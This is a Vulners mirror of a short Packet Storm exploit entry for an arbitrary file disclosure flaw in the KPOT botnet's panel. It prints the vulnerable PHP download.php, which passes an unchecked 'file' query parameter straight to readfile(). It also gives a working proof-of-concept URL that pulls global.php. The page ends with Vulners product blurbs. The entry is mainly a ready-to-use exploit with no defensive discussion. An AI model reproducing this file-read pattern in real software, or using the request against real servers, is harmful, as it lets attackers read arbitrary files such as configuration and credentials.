Lucene search
K

KPOT Botnet Arbitrary File Disclosure

🗓️ 01 Dec 2018 00:00:00Reported by n4pst3rType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 107 Views

KPOT Botnet Arbitrary File Disclosure - Exploi

Code
`################################  
# Exploit Title: KPOT Botnet - File Download/Source Code Disclosure Vulnerability  
# Google Dork: n/a  
# Date: 26/11/2018  
# Exploit Author: n4pst3r  
# Vendor Homepage: unkn0wn  
# Software Link: https://bhf.io/threads/515432/  
# Version: unkn0wn  
# Tested on: Windows 10, debian 7  
# CVE : n/a  
################################  
# Vuln-Code: download.php  
<?php  
if (isset($_GET['file']))  
{  
$file = $_GET['file'];  
header('Content-Disposition: attachment; filename="'.basename($file).'"');  
header('Content-Length: ' . filesize($file));  
readfile($file);  
}  
?>  
################################  
PoC:  
http://127.0.0.1/download.php?file=global.php  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation